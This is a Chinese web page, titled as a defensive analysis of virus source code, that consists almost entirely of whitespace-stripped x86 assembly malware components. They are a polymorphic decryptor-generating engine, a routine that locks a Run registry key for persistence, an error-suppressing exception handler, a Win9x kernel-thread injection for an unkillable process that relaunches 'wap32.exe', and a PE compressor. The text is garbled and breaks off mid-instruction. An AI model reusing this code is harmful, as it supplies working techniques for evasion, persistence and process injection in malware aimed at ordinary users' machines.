病毒源碼解析之防御分析 - 武林網

病毒源碼解析之防御分析-武林網1、超級病毒變形引擎此段代碼會在DATA段內生成一個解密代碼。.586p.modelflat,STDCALLextrnExitProcess:procVirusSize=100h.dataDecodeMethoddd?DeCode:pushadcallEncodedb100hdup(11h)Encode:db100hdup(0cch)RndReg0dd0;eaxRndReg1dd0;ebxRndCodedd0;RndCodeRndMimadd60932561;RndPassword.code@@Start:moveax,RndMimaroreax,7movRndCode,eaxmoveax,RndCodemovecx,eaxandeax,011bmovRndReg0,eaxxorecx,RndMimaandecx,011bcmpeax,ecxjnzshortChooseRegOkincecxandecx,011bChooseRegOk:movRndReg1,ecxmovedi,offsetEncoderorRndCode,1callGetBxCode,0,RndReg0,RndCodemovesi,eaxContFillStep0:cldlodsbstosbcmpal,0cchjnzContFillStep0decedirorRndCode,1callGetBxCode,1,RndReg1,RndCodemovesi,eaxContFillStep1:cldlodsbstosbcmpal,0cchjnzContFillStep1decedimovebx,edi;//計算機Jmp指令用rorRndCode,1callGetBxCode,2,RndReg0,RndCodemovesi,eaxContFillStep2:cldlodsbstosbcmpal,0cchjnzContFillStep2decedimoveax,RndMimamov[edi-4],eax;//填寫隨機密碼moveax,RndCodeandeax,01movDecodeMethod,eax;//填寫DeCode方式方法rorRndCode,1callGetBxCode,3,RndReg0,RndCodemovesi,eaxContFillStep3:cldlodsbstosbcmpal,0cchjnzContFillStep3decedirorRndCode,1callGetBxCode,4,RndReg1,RndCodemovesi,eaxContFillStep4:cldlodsbstosbcmpal,0cchjnzContFillStep4decedirorRndCode,1callGetBxCode,5,RndReg0,RndCodemovesi,eaxContFillStep5:cldlodsbstosbcmpal,0cchjnzContFillStep5decedimoval,0c3hmov[edi],al;//填寫Ret指令subebx,edimov[edi-1],bl;//填寫jmp指令int3;jmpDeCoderetGetBxCodeprocusesebxecxedxesiedi,Step:dword,Reg:dword,Rnd:dwordcallGetBxCodeAddrStep0_Eax:moveax,[esp]int3;popeaxpusheaxint3;Step0_Ebx:popebxpushebxint3;pushdwordptr[esp]popebxint3;Step0_Ecx:movecx,[esp]int3;popecxpushecxint3;Step0_Edx:movedx,[esp]int3;movedx,espmovedx,[edx]int3Step1_Eax:moveax,VirusSizeint3subeax,eaxaddax,VirusSize+3081hsubax,3081hint3Step1_Ebx:movebx,VirusSizeint3;xorebx,ebxorbx,VirusSizeint3;Step1_Ecx:subecx,ecxxorecx,(VirusSizexor3181h)xorecx,(3181h)int3;movecx,0andcx,VirusSizeint3Step1_Edx:andedx,0xordx,(VirusSize-0281h)adddx,0281hint3;xoredx,edxsubedx,(0181h-VirusSize)subedx,-0181hint3;Setp2_Eax:xor[eax],12345678hint3add[eax],12345678hint3Setp2_Ebx:xor[ebx],12345678hint3;add[ebx],12345678hint3;Setp2_Ecx:xor[ecx],12345678hint3;add[ecx],12345678hint3;Setp2_Edx:xor[edx],12345678hint3;add[edx],12345678hint3;Step3_Eax:addeax,4int3inceaxinceaxinceaxinceaxint3;Step3_Ebx:addebx,5decebxint3addebx,2addebx,2int3;Step3_Ecx:subecx,-4int3subecx,-5dececxint3;Step3_Edx:incedxsubedx,-3int3addedx,04int3;Step4_Eax:subeax,4int3deceaxdeceaxdeceaxsubeax,1int3;Step4_Ebx:decebxsubebx,3int3;decebxdecebxsubebx,2int3;Step4_Ecx:addcx,123subcx,123+4int3subcx,-4deccxsubcx,7int3Step4_Edx:subdx,2decdxsubdx,1int3incedxsubdx,5int3;Step5_Eax:jnz$int3ja$int3Step5_Ebx:jg$int3jnb$int3Step5_Ecx:jnl$int3jnz$int3Step5_Edx:ja$int3jg$int3GetBxCodeAddr:popesimoval,0cch;//指令分割符movecx,Stepshlecx,1shlecx,1addecx,Reg;//計算機得到的指令位置shlecx,1andRnd,01baddecx,RndjcxzshortGetBxCodeOverContFindCode:pushecxContFindCC:incesicmp[esi],aljnzContFindCCpopecxloopContFindCodemoveax,esiinceaxretGetBxCodeOver:moveax,esiretGetBxCodeendpend@@Start2、Windows9x/2000/xp瑣定注冊表.586p.modelflat,STDCALL.dataHKeyStrdbSOFTWAREMicrosoftWindowsCurrentVersionRun,0ValueNamedbwap32,0PathNamedbwap32.exe,0.codeextrnRegOpenKeyA:procextrnRegSetValueExA:procextrnRegCloseKey:procextrnExitProcess:procextrnRegNotifyChangeKeyValue:procextrnCreateThread:procextrnSleep:procextrnRegQueryValueExA:procstart:pusheaxcallRegOpenKeyA,080000002h,offsetHKeyStr,esppopebxcallRegSetValueExA,ebx,offsetValueName,0,01,offsetPathName,100hsubesp,100hmoveax,esppush100hcallRegQueryValueExA,ebx,offsetValueName,0,0,eax,esppopeaxaddesp,100hpusheaxcallCreateThread,0,0,offsetRegProtectProc,ebx,0,esppopeaxcallSleep,1000*60*3retRegProtectProcprochKey:dwordmovebx,hKeysubesp,100hmovedi,espcallGetProtectKeyNamedbwap32,0GetProtectKeyName:popesipush100hcallRegQueryValueExA,ebx,esi,0,0,edi,esppopeaxWaitRegChangeNotify:callRegNotifyChangeKeyValue,ebx,0,4,0,0callRegSetValueExA,ebx,esi,0,01,edi,100hjmpshortWaitRegChangeNotifyRegProtectProcendpendstart3、Windows9x/2000意外處理通用程序此段程序能夠到達屏蔽程序錯誤的效果includewap32.inc.386p.modelflat,stdcallextrnMessageBoxA:procextrnExitProcess:proc.dataMsgdbFuck,0SetSehFrame:;ecx=忽略錯誤繼續(xù)執(zhí)行地址popeax;彈出返回地址pushecx;保存忽略錯誤繼續(xù)執(zhí)行地址callPushExceptionProcjmpshortExceptionPushExceptionProc:pushfs:dwordptr[0]movfs:[0],espcallGetEspAddrpushD[edx];保存原Esp地址值mov[edx],espjmpeaxClearSehFrame:popeax;彈出返回地址callGetEspAddrmovesp,[edx]popD[edx];恢復原Esp地址值popfs:dwordptr[0]popecxpopecx;彈出忽略錯誤繼續(xù)執(zhí)行地址jmpeaxExceptionprocpRecord,pFrame,pContext,pDispatchcallPushSehBackProccallClearSehFramejmpecxPushSehBackProc:popecxmoveax,pContextmov[eax.cx_Eip],ecxxoreax,eax;忽略錯誤繼續(xù)執(zhí)行retExceptionendpGetEspAddr:callPushOffsetEspAddrdd?PushOffsetEspAddr:popedxret.codeStart:callPushErrorProccallMessageBoxA,0,offsetMsg,offsetMsg,0retPushErrorProc:popecxcallSetSehFramemovds:[0],eaxcallClearSehFrameretendStart4、Windows9x下進程不死術此段程序首先實現Win9x下注射遠程線程〔新技術〕然后與Win2k下進程不死術一樣了。includeWin32.inc.386p.modelflat,stdcallextrnGetProcAddress:procextrnWinExec:procextrnMessageBoxA:procextrnSleep:procextrnGetCurrentProcessId:procextrnOpenProcess:procextrnGetCurrentProcess:procextrnWriteProcessMemory:procextrnGetExitCodeProcess:proc.data;問題,要Sleep()這樣做使Kernel32有時機更新數據KnlThreadprocProcID:dwordcallGetKnlOpenProcessKnlOpenProcessdd?GetKnlOpenProcess:popeaxcall[eax],PROCESS_ALL_ACCESS,FALSE,ProcIDoreax,eaxjzshortExitProtectProcmovebx,eaxcallGetKnlWaitForSingleObjectKnlWaitForSingleObjectdd?GetKnlWaitForSingleObject:popeaxcall[eax],ebx,-1hcallGetFileNameAddressGetFileNameAddress:popecxaddecx,offsetFileName-offsetGetFileNameAddresscallGetKnlWinExecKnlWinExecdd?GetKnlWinExec:popeaxcall[eax],ecx,01ExitProtectProc:retKnlThreadendpFileNamedbc:wap32.exe,0KnlOpenProcessStrdbOpenProcess,0KnlWaitForObjectStrdbWaitForSingleObject,0KnlWinExecStrdbWinExec,0KnlSleepStrdbSleep,0KnlCreateKnlThreadStrdbCreateKernelThread,0.codeStart:callGetProcAddress,0bff70000h,offsetKnlOpenProcessStrmovKnlOpenProcess,eaxcallGetProcAddress,0bff70000h,offsetKnlWaitForObjectStrmovKnlWaitForSingleObject,eaxcallGetProcAddress,0bff70000h,offsetKnlWinExecStrmovKnlWinExec,eaxcallMoveDataToKnl,offsetStart,0bff70600h,100hcallGetProcAddress,0bff70000h,offsetKnlCreateKnlThreadStrmovebx,eaxcallGetCurrentProcessIdpusheaxcallebx,0,0,0bff70000h+600h,eax,0,esppopeaxcallMessageBoxA,0,offsetFileName,offsetFileName,0retMoveDataToKnlprocusesebxesiedi,Src:dword,Des:dword,nCx:dwordpusheaxsidt[esp-2]popeaxaddeax,3*8movebx,[eax]movedx,[eax+4]callSetIdt03pushadmov[eax],ebxmov[eax+4],edxcldrepmovsbpopadiretSetIdt03:clipopW[eax]popW[eax+6]movesi,Srcmovedi,Desmovecx,nCxint3;stiretMoveDataToKnlendpendStart5、簡單算法，高效率壓縮PE文件.586p.modelflat,STDCALL.dataOldFiledbpe.exe,0NewFiledbpe.zzz,0FileDatadb0,0.codeextrn_lopen:proc,_lcreat:procextrn_lread:proc,_lwrite:procextrn_lclose:procextrnExitProcess:procstart:call_lopen,offsetOldFile,0cmpeax,-1jzExitProcmovesi,eaxcall_lcreat,offsetNewFile,0cmpeax,-1jzCloseOldFilemovedi,eaxxorebx,ebxReadData:call_lread,esi,offsetFileData,1oreax,eaxjzshortReadOvermovzxeax,FileDataoreax,eaxjnzshortNoZeroincebxcmpebx,0ffhjnzshortReadDataxoreax,eaxmovah,blxchgax,wordptrFileDatacall_lwrite,edi,offsetFileData,2xorebx,ebxjmpshortReadDataNoZero:orebx,ebxjnzshortNoZeroDatacall_lwrite,edi,offsetFileData,1jmpshortReadDataNoZeroData:pusheaxxoreax,eaxmovah,blmovwordptrFileData,axcall_lwrite,edi,offsetFileData,2xorebx,ebxpopeaxmovFileData,alcall_lwrite,edi,offsetFileData,1jmpReadDataReadOver:orebx,ebxjzshortCloseFilexoreax,eaxmovah,blxchgax,wordptrFileDatacall_lwrite,edi,offsetFileData,2xorebx,ebxCloseFile:call_lclose,ediCloseOldFile:call_lclose,esiExitProc:callExitPr